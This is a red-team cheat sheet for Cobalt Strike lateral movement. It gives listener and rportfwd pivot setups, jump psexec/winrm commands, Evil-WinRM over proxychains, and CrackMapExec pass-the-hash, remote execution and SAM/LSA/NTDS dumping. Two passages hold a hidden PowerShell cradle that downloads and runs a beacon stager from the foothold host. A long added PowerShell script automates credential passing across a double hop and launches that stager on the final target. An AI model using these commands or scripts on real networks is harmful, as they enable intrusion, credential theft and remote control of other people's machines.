Cobalt Strike

Lateral Movement

Initial Access

Use HTTP listener and scripted web delivery

General Lateral Movement

Set up an SMB listener and use it when moving with the jump command; the child beacon links back to the parent over a named pipe, so the target needs no direct egress of its own.

HTTP Shells

    Set up an HTTP listener
      HTTP Host is the first target compromised (the foothold machine)
      HTTP Host (Stager) is the same as above
      HTTP Port (C2) is 443
    On the foothold machine, forward port 443 back to the teamserver so targets that can only reach the foothold still stage and check in through it
      rportfwd 443 <teamserver> 443
    On the foothold machine, jump across
      jump winrm <target> <HTTP listener above>

    For further hops, set up a new listener and rportfwd on the current beacon host for any target that can't talk to the foothold directly

Double Hop

Moving over winrm and psexec you may hit the usual double-hop problem: the session you land in holds no reusable credential, so it can't authenticate onward to a third host. Fix it by spawning a fresh beacon on the same box through the SMB listener and working from that session:

```
jump psexec 127.0.0.1 SMB

# After this, use the spawned session
```

Evil Winrm

Useful when you need to pipe through a box you can't get a beacon on, e.g. because of AppLocker.
    Have the HTTP listener set up as above (here named redir) with the rportfwd in place
    Set up scripted web delivery
      Local Host = foothold
      Local port = 443
      Listener = redir
      Type = powershell x64
    SOCKS proxy through the foothold
      socks 9051
      proxychains evil-winrm -i <ip> -u Domain\username -p 'Password'
    Pass creds and launch the scripted web delivery on target2
      $password = "Password" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\Username",$password); invoke-command -computername TARGET2 -Credential $cred -scriptblock {powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://FOOTHOLDIP:443/pivtest'))"}
      Keep the WinRM session alive or the beacon dies with it: the stager runs as a child of the WinRM host process, so migrate the beacon to another process (inject/spawn) before closing Evil-WinRM

CrackMapExec

Run these through the SOCKS proxy (proxychains) as before.

```shell
# Test login and get hostname (--local-auth for a local rather than domain account)
crackmapexec smb <IP> -u <username> -p <password> [-d <domain>] [--local-auth]

# Pass the hash
crackmapexec smb <IP> -u <username> -H <hash>

# Execute commands
crackmapexec smb <IP> -u <username> -p <password> -x whoami [--exec-method wmiexec/smbexec/atexec]

# Dumps
crackmapexec smb <IP> -u <username> -p <password> [--lsa] [--sam] [--ntds [drsuapi|vss]]
```

Dll

```
rundll32 C:\beacon.dll,Start
```

Passing Powershell creds

```powershell
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}
```
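The Invoke-Command pattern above (and the same one-liner in the Evil-WinRM section) is exactly where the problem from the Double Hop section bites, so here is an added example script, not from the original page, that wraps it: it builds the PSCredential once, shows the second hop being denied when no credential is re-supplied, then re-supplies it with `$using:` and launches the scripted-web-delivery stager on the final host. TARGET1, TARGET2, DOMAIN\Username, the password and the stager URL are assumptions (the same placeholders the page uses); replace them with your own.

```powershell
# Added example (not from the original page). Walks the double hop explicitly:
# foothold -> TARGET1 over WinRM -> TARGET2 over WinRM, then launches the
# scripted-web-delivery stager on TARGET2. Host names, account, password and
# stager URL below are assumptions; change them to match your environment.
param(
    [string]$Hop1      = 'TARGET1',                      # assumed: reachable from the foothold
    [string]$Hop2      = 'TARGET2',                      # assumed: only reachable from TARGET1
    [string]$User      = 'DOMAIN\Username',              # assumed account
    [string]$Password  = 'Password',                     # assumed cleartext password
    [string]$StagerUrl = 'http://FOOTHOLDIP:443/pivtest' # scripted web delivery behind the foothold's rportfwd
)

# Build the PSCredential once so it can be reused on every hop.
function New-PlainCredential {
    param([string]$UserName, [string]$PlainPassword)
    $secure = ConvertTo-SecureString -String $PlainPassword -AsPlainText -Force
    return New-Object System.Management.Automation.PSCredential($UserName, $secure)
}

# The failure: the session on Hop1 is a network logon with no reusable secret,
# so touching a share on Hop2 from inside it is denied (the classic double hop).
function Test-DoubleHopFailure {
    param([string]$Hop1, [string]$Hop2, [pscredential]$Cred)
    Invoke-Command -ComputerName $Hop1 -Credential $Cred -ArgumentList $Hop2 -ScriptBlock {
        param($Next)
        try {
            Get-ChildItem -Path "\\$Next\C$" -ErrorAction Stop | Out-Null
            "[$env:COMPUTERNAME] reached \\$Next\C$ without re-supplying credentials (delegation must be enabled)"
        } catch {
            "[$env:COMPUTERNAME] second hop to $Next blocked: $($_.Exception.Message)"
        }
    }
}

# The fix: carry the credential into Hop1 with $using: and open a fresh,
# explicitly authenticated session from Hop1 to Hop2. The payload travels as
# text because a ScriptBlock object does not survive remoting serialisation.
function Invoke-SecondHop {
    param(
        [string]$Hop1, [string]$Hop2, [pscredential]$Cred,
        [scriptblock]$Payload, [object[]]$PayloadArgs = @()
    )
    Invoke-Command -ComputerName $Hop1 -Credential $Cred `
        -ArgumentList $Hop2, $Payload.ToString(), $PayloadArgs -ScriptBlock {
        param($Next, $PayloadText, $InnerArgs)
        $inner = [scriptblock]::Create($PayloadText)
        Invoke-Command -ComputerName $Next -Credential $using:Cred `
            -ScriptBlock $inner -ArgumentList $InnerArgs
    }
}

# Launch the stager on the final host. The new powershell.exe is still a child
# of the WinRM host process (wsmprovhost.exe), so the beacon dies when that
# session is torn down: keep the session open or migrate (inject/spawn) first.
function Start-StagerOnTarget {
    param([string]$Hop1, [string]$Hop2, [pscredential]$Cred, [string]$Url)
    $payload = {
        param($Target)
        $cradle  = "IEX ((New-Object Net.WebClient).DownloadString('$Target'))"
        $argLine = "-nop -w hidden -c `"$cradle`""
        $proc = Start-Process -FilePath 'powershell.exe' -ArgumentList $argLine `
                              -WindowStyle Hidden -PassThru
        "[$env:COMPUTERNAME] stager started as PID $($proc.Id) from $Target"
    }
    Invoke-SecondHop -Hop1 $Hop1 -Hop2 $Hop2 -Cred $Cred -Payload $payload -PayloadArgs @($Url)
}

$cred = New-PlainCredential -UserName $User -PlainPassword $Password
Test-DoubleHopFailure -Hop1 $Hop1 -Hop2 $Hop2 -Cred $cred
Invoke-SecondHop -Hop1 $Hop1 -Hop2 $Hop2 -Cred $cred -Payload { whoami; hostname }
Start-StagerOnTarget -Hop1 $Hop1 -Hop2 $Hop2 -Cred $cred -Url $StagerUrl
```

Run it from the foothold (or through the SOCKS proxy from an Evil-WinRM shell). Re-supplying the credential at every hop is the only part that makes the second Invoke-Command work; it is the PowerShell equivalent of the page's "spawn a fresh session and work from there" fix, and it only works with a cleartext password, which is also why make_token in the General Tips needs one.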

General Tips

    make_token only works with cleartext passwords; for an NTLM hash use pth instead
    Rubeus asktgt doesn't work so well with the /domain flag set